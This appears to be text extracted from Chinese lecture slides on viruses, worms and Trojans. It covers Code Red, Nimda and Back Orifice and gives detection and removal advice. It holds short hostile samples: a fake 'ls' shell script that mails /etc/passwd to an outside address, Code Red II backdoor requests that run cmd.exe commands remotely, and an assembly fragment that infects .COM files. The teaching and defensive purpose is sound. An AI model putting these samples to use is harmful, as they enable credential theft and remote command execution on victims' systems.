计算机病毒、蠕虫和特洛伊木马提纲 计算机病毒 网络蠕虫 特洛伊木马计算机病毒 病毒结构模型 病毒的分类 引导型病毒 文件型病毒 宏病毒 病毒举例 病毒防范计算机病毒的结构传染条件判断传染代码表现及破坏条件判断破坏代码传染模块表现模块计算机病毒的分类 按攻击平台分类：DOS,Win32，MAC，Unix 按危害分类：良性、恶性 按代码形式：源码、中间代码、目标码 按宿主分类： 引导型 主引导区 操作系统引导区 文件型 操作系统 应用程序 宏病毒引导型病毒引导记录 主引导记录（MBR）55AA主引导程序(446字节)分区1(16 字节)主分区表 (64字节）分区2(16 字节) 分区3(16 字节) 分区4(16 字节)结束标记 （2字节）引导代码及 出错信息A引导型病毒系统引导过程Power OnCPU setup to find a file INT 21;find the host file MOV AX, 3D02;setup to open the host file INT 21;open host file MOV AH, 40;setup to write file to disk INT 21;write to file DB *.COM;what files to look for宏病毒（Macro Virus） 历史： 1980年，Dr. Fredrick Cohen and Ralf Burger 论 文 1994年，Microsoft Word 第一例宏病毒 Word, Excel, Access, PowerPoint, Project, Lotus AmiPro, Visio, Lotus 1-2-3, AutoCAD, Corel Draw.使用数据文件进行传播，使得反病毒软件不再 只关注可执行文件和引导区 DOE ViRT 统计，85%的病毒感染归因于宏病 毒 易于编写，只需要一两天的时间，1015行代 码 大量的用户：90 Million MS Office Users人们通常不交换程序，而交换数据宏病毒工作机理有毒文件.docNormal.dot激活autoopen宏写入无毒文件.docNormal.dot启动激活病毒注意事项 Macro 可以存在模板里，也可以存在文 档里 RTF文件也可以包含宏病毒 通过IE 浏览器可以直接打开，而不提示 下载提纲 计算机病毒 网络蠕虫 特洛伊木马蠕虫（Worm） 一个独立的计算机程序，不需要宿主 自我复制，自主传播（Mobile） 占用系统或网络资源、破坏其他程序 不伪装成其他程序，靠自主传播 利用系统漏洞； 利用电子邮件（无需用户参与）莫里斯蠕虫事件 发生于1988年，当 时导致大约6000台 机器瘫痪 主要的攻击方法 Rsh，rexec：用 户的缺省认证 Sendmail 的 debug模式 Fingerd的缓冲区 溢出 口令猜测CR I 主要影响Windows NT 系统和Windows 2000 主要影响国外网 络 据CERT统计，至 8月初已经感染超过25 万台 主要行为 利用IIS 的 Index服务的缓冲区溢 出缺陷进入系统 检查c:notworm 文件是否存在以判断 是否感染 中文保护（是中 文windows就不修改主 页） 攻击白宫！CR II Inspired by RC I影响波及全球 国内影响尤其广泛 主要行为 所利用缺陷相同 只感染windows2000系统，由于一些参数 的问题，只会导致NT死机 休眠与扫描：中文windows，600个线程Nimda 简介 影响系统：MS win9x, wind2k, win XP 传播途径： Email、文件共享、页面浏览、 MS IIS目录遍历、Code Red 后门 影响 群发电子邮件，付病毒 扫描共享文件夹， 扫描有漏洞的IIS, 扫描有Code Red后门的IIS Server红色代码病毒 红色代码病毒是一种结合了病毒、木马 、DDOS机制的蠕虫。 2001年7月中旬，在美国等地大规模蔓延 。 2001年8月初，出现变种coderedII，针对 中文版windows系统，国内大规模蔓延。 通过80端口传播。 只存在与网络服务器的内存，不通过文 件载体。 利用IIS缓冲区溢出漏洞（2001年6月18 日发布）CodeRed I在侵入一台服务器后，其运行步骤是： 设置运行环境，修改堆栈指针，设置堆栈大小为218h字节。接着 使用RVA（相对虚拟地址）查找GetProcAddress的函数地址，然 后就获得其他socket、connect、send、recv、closesocket等函数地 址； 如果C:notworm在，不再进一步传染； 传染其他主机。创造100个线程，其中99个用户感染其他WEB服 务器，被攻击IP通过一个算法计算得出； 篡改主页，如果系统默认语言为“美国英语”，第100个进程就将 这台服务的主页改成“Welcome to http:/www.worm.com !, Hacked By Chinese!”，并持续10个小时。（这个修改直接在内存中修改 ，而不是修改*.htm文件）； 如果时间在20：00UTC和23：59UTC之间，将反复和白宫主页建 立连接，并发送98k字节数据，形成DDOS攻击。CodeRed II增加了特洛依木马的功能，并针对中国网站做了改进 计算IP的方法进行了修改，使病毒传染的更快； 检查是否存在CodeRedII原子，若存在则进入睡眠状态防止反复 感染，若不存在则创建CodeRedII原子； 创建300个线程进行传染，若系统默认语言为简体中文或繁体中 文，则创建600个线程； 检查时间。病毒作者的意图是传播过程在2001年10月1日完成， 之后，蠕虫会爆发而使系统不断重新启动。 在系统中安装一个特洛依木马： 拷贝系统目录cmd.exe到IIS的脚本执行目录下，改名为 root.exe； 将病毒体内的木马解压缩写到C盘和D盘的explorer.exe 木马每次系统和启动都会运行，禁止系统的文件保护功能，并 将C盘和D盘通过web服务器共享CodeRed II 攻击形式 http:/x.x.x.x/c/inetpub/scripts/root.exe?/c+dir http:/x.x.x.x/c/winnt/system32/cmd.exe?/c+dir其中x.x.x.x是被攻击的IP地址，dir可以是任意命令，比如删 除系统中的文件，向外发送机密数据等，这个后门后来也成为了 nimda病毒的一个传播模式。下面是cert/cc上提供的被攻击服务器日志(CA-2001-11) 2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/././winnt/system32/cmd.exe /c+dir 200 2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/././winnt/system32/cmd.exe /c+dir+. 200 红色代码病毒的检测和防范 针对安装IIS的windows系统； 是否出现负载显著增加（CPU/网络）的现象； 用netstat an检查是否有许多对外的80端口连接 在web日志中检查是否有 /default.ida?xxx.%u0078%u0000 u00=a HTTP/1.0这 样的攻击记录； 查找系统中是否存在文件c:explorer.exe或 d:explorer.exe 以及root.exe； 检查注册表文件中是否增加了C和D虚拟目录，以及文 件保护功能是否被禁止。 在任务管理器中检查是否存在两个explorer.exe进程。提纲 计算机病毒 网络蠕虫 特洛伊木马特洛伊木马 名字来源：古希腊故事 通过伪装成其他程序、有意隐藏自己恶意 行为的程序，通常留下一个远程控制的后 门 没有自我复制的功能 非自主传播 用户主动发送给其他人 放到网站上由用户下载最简单的木马举例ls#!/bin/sh /bin/mail myaddresstest.com /etc/passwd lsPATH=./ :/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin特洛依木马举例 Back Orifice Cult of the Dead Cow在1998年8月发布, 公开源 码软件，遵守GPL，是功能强大的远程控制器木马 。 boserver.exe、boconfig.exe、bogui.exe 在BO服务器上启动、停止基于文本的应用程序 目录和文件操作。包括创建、删除、查看目录、查找、解 压、压缩。 共享。创建共享资源 HTTP服务。启动或停止HTTP服务。 击键记录。将BO服务器上用户的击键记录在一个文本文 件中，同时记录执行输入的窗口名。（可以获得用户口令 ）特洛依木马视频输入、播放。捕捉服务器屏幕到一个位图 文件中。 网络连接。列出和断开BO服务器上接入和接出 的连接，可以发起新连接。 查看信息。查看所有网络端口、域名、服务器 和可见的共享“出口”。返回系统信息，包括机器名 、当前用户、CPU类型、内存容量及可用内存、 Windows版本、驱动器类型、硬盘容量及使用空间 。 端口重定向。 注册表 锁住或重启计算机。 传输文件特洛依木马使用netstat a 检查是否还有未知端口监 听(默认31337)检测和删除 注册表 HLMsoftwaremicrosoftwindowscurrentVersionr unservices键值，是否有“Name Data.exe”，若有 则删除 C:windowssystem目录： 删除“ .exe”文件和windll.dll文件特洛依木马 其他木马 国外 subsever、dagger 、 ACKcmdC、 DeepThroat、 SatansBackdoor 等国内（更常见 ） 冰河、广外女生、 netspy、黑洞等删除木马的通用方法 Win.ini文件 windows节中run=和load system.ini文件 boot节的shell=explorer.exe Autoexec.bat文件 win命令 注册表 HLMsoftwaremicrosoftwindowscurrentversionrun HCUsoftwaremicrosoftwindowscurrentversionrunonce HCRexefileshellopencommand “%1” %* HCUcontrol paneldesktopwallpaper更高级的木马技术 服务器端程序文件的隐藏 问题：磁盘上的文件、系统中的进程 木马：DLL 陷阱 防范：DLL 签名技术 隐藏端口监听 寄生：选择一个已经打开的端口，如80 潜伏：不使用TCP/UDP, 使用ICMP 突破防火墙的限制 反弹端口型木马：突破防火墙的限制:反弹端口型木马Web Server病毒、蠕虫与木马的比较特性病毒蠕虫木马宿主需要不需要需要表现形式不以文件形式存在独立的文件伪装成其他文件传播方式依赖宿主文件或介 质自主传播依靠用户主动传 播 主要危害破坏数据完整性、 系统完整性侵占资源留下后门，窃取 信息传